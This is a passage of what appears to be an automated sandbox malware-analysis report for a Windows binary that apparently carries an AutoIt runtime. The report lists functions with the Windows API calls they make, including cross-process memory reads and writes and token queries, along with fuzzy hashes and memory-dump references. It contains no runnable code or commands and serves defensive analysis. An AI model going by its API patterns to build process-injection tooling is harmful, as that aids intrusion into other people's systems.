                                                                                                                    • Opcode Fuzzy Hash: 3c9c13580fda1005ad2b2ae4e6716d4d9e4e57fb8296fcf9ba0b3c52d7e1f558
                                                                                                                    • Instruction Fuzzy Hash: 01110C76D08204BFD7179FA8EC44ADB7FACEB49321F144269F814D3251D671CD448BA0
                                                                                                                    Function 00308202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0030821E
                                                                                                                    • GetLastError.KERNEL32(?,00307CE2,?,?,?), ref: 00308228
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00307CE2,?,?,?), ref: 00308237
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00307CE2,?,?,?), ref: 0030823E
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00308255
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 842720411-0
                                                                                                                    • Opcode ID: be3cfab37465a7e0ce67edc5fb9351828df6da76b0655804afaacb18b0cb1bee
                                                                                                                    • Instruction ID: 41c03e19624115d6c881422b0fb3a6c855f56c07ba10d29a4c65564ed452356d
                                                                                                                    • Opcode Fuzzy Hash: be3cfab37465a7e0ce67edc5fb9351828df6da76b0655804afaacb18b0cb1bee
                                                                                                                    • Instruction Fuzzy Hash: 7E016271A01604FFDB124FA6DC88D677B6CEF85754F500829F849C2160DA318C10DA60
                                                                                                                    Function 0030710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?,?,00307455), ref: 00307127
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 00307142
                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 00307150
                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?), ref: 00307160
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 0030716C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    • Opcode ID: 8576d1cd46d56cda0abc2ca59efeb622d0bbfb0fea03a59fedfc4a38c6c6b6f8
                                                                                                                    • Instruction ID: 836b5bfeaf57489a4f7976d5654e484c2ce412257b827ec6eaf4b693cccb8269
                                                                                                                    • Opcode Fuzzy Hash: 8576d1cd46d56cda0abc2ca59efeb622d0bbfb0fea03a59fedfc4a38c6c6b6f8
                                                                                                                    • Instruction Fuzzy Hash: 0A017C76A02204BFDB1A4F64DC84AAA7BBDEB447A1F150065FD08D62A0D731ED41DBA0
                                                                                                                    Function 00315244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00315260
                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0031526E
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00315276
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00315280
                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003152BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: a7f0f0d90f2bdf0e2686b3102411b7545abff3647ebebccb1f883c0d1d69929a
                                                                                                                    • Instruction ID: 6aade422e5b86be4b9796ee3e5fb8f281e1dcb062133a41433b2f8a0dbf65a93
                                                                                                                    • Opcode Fuzzy Hash: a7f0f0d90f2bdf0e2686b3102411b7545abff3647ebebccb1f883c0d1d69929a
                                                                                                                    • Instruction Fuzzy Hash: E1015732D01A19DBCF06EFE4E8899EEBB7CBB4D311F810856E945F2140CB3059958BA1
                                                                                                                    Function 0030810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00308121
                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0030812B
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0030813A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00308141
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00308157
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 0964672e0798e417d6289bc31048dc8a6dff8d295cb5091daff51f1256726705
                                                                                                                    • Instruction ID: 1f2294bd776ac2e18d926a5bba0081cd2f4c403ed50387a89e733d264a08eb82
                                                                                                                    • Opcode Fuzzy Hash: 0964672e0798e417d6289bc31048dc8a6dff8d295cb5091daff51f1256726705
                                                                                                                    • Instruction Fuzzy Hash: 1EF06275601304BFEB160FA5ECD8E673BACFF49754F400025F985C61A0CB61DD55DA60
                                                                                                                    Function 0030C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0030C1F7
                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0030C20E
                                                                                                                    • MessageBeep.USER32(00000000), ref: 0030C226
                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 0030C242
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0030C25C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: ae1acaf8224d646c454f640a336360cf77e34eec5818e280ab09390a3e3bac52
                                                                                                                    • Instruction ID: 43e43065a64e69c435378ec191ae648acc219cd04bef4687102b1c393b2ccbac
                                                                                                                    • Opcode Fuzzy Hash: ae1acaf8224d646c454f640a336360cf77e34eec5818e280ab09390a3e3bac52
                                                                                                                    • Instruction Fuzzy Hash: E501A730814704ABEB225B60DD9EB96777CBB00705F400669A582918E0D7E469548B50
                                                                                                                    Function 002B13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EndPath.GDI32(?), ref: 002B13BF
                                                                                                                    • StrokeAndFillPath.GDI32(?,?,002EB888,00000000,?), ref: 002B13DB
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002B13EE
                                                                                                                    • DeleteObject.GDI32 ref: 002B1401
                                                                                                                    • StrokePath.GDI32(?), ref: 002B141C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: 4dcad25771a95bd6e94ba09e87eaf3806e7d8cee838206b4ffa17628fa7151ff
                                                                                                                    • Instruction ID: c2418fffedb65881f006ff8f2acb436ba53c5a017d195a3270e06b96d42d8d54
                                                                                                                    • Opcode Fuzzy Hash: 4dcad25771a95bd6e94ba09e87eaf3806e7d8cee838206b4ffa17628fa7151ff
                                                                                                                    • Instruction Fuzzy Hash: 51F0FB30511A09EFDB2B5F1AED887983FA8E701366F488224E429480B2C77045F5DF11
                                                                                                                    Function 0031C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0031C432
                                                                                                                    • CoCreateInstance.OLE32(00342D6C,00000000,00000001,00342BDC,?), ref: 0031C44A
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • CoUninitialize.OLE32 ref: 0031C6B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                    • Opcode ID: 8eeacf9d7798fcfb95ef91e779258f66e615e918555b4bdceec2ed2e6c121e38
                                                                                                                    • Instruction ID: 078884ebd72948fc9cec780134e6a9a9b646419d1ddfc2384a0c2a570850db05
                                                                                                                    • Opcode Fuzzy Hash: 8eeacf9d7798fcfb95ef91e779258f66e615e918555b4bdceec2ed2e6c121e38
                                                                                                                    • Instruction Fuzzy Hash: 39A14A71214205AFD700EF54C881EABB7ECFF89394F00491CF5559B1A2EB71EA59CB92
                                                                                                                    Function 002C2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D0DB6: std::exception::exception.LIBCMT ref: 002D0DEC
                                                                                                                      • Part of subcall function 002D0DB6: __CxxThrowException@8.LIBCMT ref: 002D0E01
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 002B7A51: _memmove.LIBCMT ref: 002B7AAB
                                                                                                                    • __swprintf.LIBCMT ref: 002C2ECD
                                                                                                                    Strings
                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002C2D66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                    • Opcode ID: 870c0b562175254e5a168397471ada355ea9d7919fda3adac0656c8d20cf8616
                                                                                                                    • Instruction ID: 4a09bb1d18b8a059f9dd797e917d00558d87ecae32a60a67b001ec66ec8589d3
                                                                                                                    • Opcode Fuzzy Hash: 870c0b562175254e5a168397471ada355ea9d7919fda3adac0656c8d20cf8616
                                                                                                                    • Instruction Fuzzy Hash: 8F917D31128616DFC714EF24C889DBEB7B4EF85754F00492DF585AB2A1DA30ED68CB52
                                                                                                                    Function 0031B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0031B9BB
                                                                                                                    • CoCreateInstance.OLE32(00342D6C,00000000,00000001,00342BDC,?), ref: 0031B9D4
                                                                                                                    • CoUninitialize.OLE32 ref: 0031B9F1
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                    • Opcode ID: 316d19eb3937571115a9d7fdccdcf6b85265db09d20b941c91064cab9450d8d9
                                                                                                                    • Instruction ID: efdfd10414ec9693cc7e323deb5f655859b2235a882d4ac223415389a450a54f
                                                                                                                    • Opcode Fuzzy Hash: 316d19eb3937571115a9d7fdccdcf6b85265db09d20b941c91064cab9450d8d9
                                                                                                                    • Instruction Fuzzy Hash: AAA145756043019FCB05EF14C484D9ABBE5FF89314F058998F9999B3A1CB31EC85CB91
                                                                                                                    Function 0030B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0030B4BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container$%4
                                                                                                                    • API String ID: 3565006973-3553967331
                                                                                                                    • Opcode ID: 8e50ee3b964e3a82beb0e047d79136b9917aba22ce1d2ec1e297207abd3e500a
                                                                                                                    • Instruction ID: 82f98ce5ec2de323cabebb513e11f4661501bdd314065cac0741eef1fbf373e2
                                                                                                                    • Opcode Fuzzy Hash: 8e50ee3b964e3a82beb0e047d79136b9917aba22ce1d2ec1e297207abd3e500a
                                                                                                                    • Instruction Fuzzy Hash: EE916974601601AFDB15CF24C894B6ABBF9FF49700F2084AEF94ACB6A1DB70E841CB50
                                                                                                                    Function 002D501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 002D50AD
                                                                                                                      • Part of subcall function 002E00F0: __87except.LIBCMT ref: 002E012B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                    • String ID: pow
                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                    • Opcode ID: d1a3ec5979b7b739ef2b9f269375b41b95fc7088c8af3c0814bac842a6cd7f33
                                                                                                                    • Instruction ID: 41eca4ee0224463967b61fa1a364e1538355d4cf96f90cc9d110163675a5795d
                                                                                                                    • Opcode Fuzzy Hash: d1a3ec5979b7b739ef2b9f269375b41b95fc7088c8af3c0814bac842a6cd7f33
                                                                                                                    • Instruction Fuzzy Hash: 2551BC2097C54382DB117F25C88137E2BD49B01301F648D5AE4C98E3A9DFF48DFA9E82
                                                                                                                    Function 002F8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: 3c,$_,
                                                                                                                    • API String ID: 4104443479-370742736
                                                                                                                    • Opcode ID: 8ade6735bbe1b4d26e392e43cf7dadab36c1bacd4e8153530a0e4b310b27765b
                                                                                                                    • Instruction ID: 8042310df4950048cd5ece1fd3f25787fb661522756d0a7e484f9d690e1ef74e
                                                                                                                    • Opcode Fuzzy Hash: 8ade6735bbe1b4d26e392e43cf7dadab36c1bacd4e8153530a0e4b310b27765b
                                                                                                                    • Instruction Fuzzy Hash: FF518DB091061A9FCF20CF68C890ABEFBB1FF44344F148529E95AD7250EB30E965CB51
                                                                                                                    Function 003097F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003114BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00309296,?,?,00000034,00000800,?,00000034), ref: 003114E6
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0030983F
                                                                                                                      • Part of subcall function 00311487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003092C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003114B1
                                                                                                                      • Part of subcall function 003113DE: GetWindowThreadProcessId.USER32(?,?), ref: 00311409
                                                                                                                      • Part of subcall function 003113DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0030925A,00000034,?,?,00001004,00000000,00000000), ref: 00311419
                                                                                                                      • Part of subcall function 003113DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0030925A,00000034,?,?,00001004,00000000,00000000), ref: 0031142F
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003098AC
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003098F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: e8c112b1433acaf60052f7d53360c7b89f88f1d2251ad983c025af11eccfa9e7
                                                                                                                    • Instruction ID: 5457c15195991ff3c2a548f8c406ac75f8025b5bad77c5078c847d2c7ba0df77
                                                                                                                    • Opcode Fuzzy Hash: e8c112b1433acaf60052f7d53360c7b89f88f1d2251ad983c025af11eccfa9e7
                                                                                                                    • Instruction Fuzzy Hash: A4415C76901218BFCB15DFA4CD96BDEBBB8EB09700F004199FA55B7181DA706E85CBA0
                                                                                                                    Function 00337946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0033F910,00000000,?,?,?,?), ref: 003379DF
                                                                                                                    • GetWindowLongW.USER32 ref: 003379FC
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00337A0C
